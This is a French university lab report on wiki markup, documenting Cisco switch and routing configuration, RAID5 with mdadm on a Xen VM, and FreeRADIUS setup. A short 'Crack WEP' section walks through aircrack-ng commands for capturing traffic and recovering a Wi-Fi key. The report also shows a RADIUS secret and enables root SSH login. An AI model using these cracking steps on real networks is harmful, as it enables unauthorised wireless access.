 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
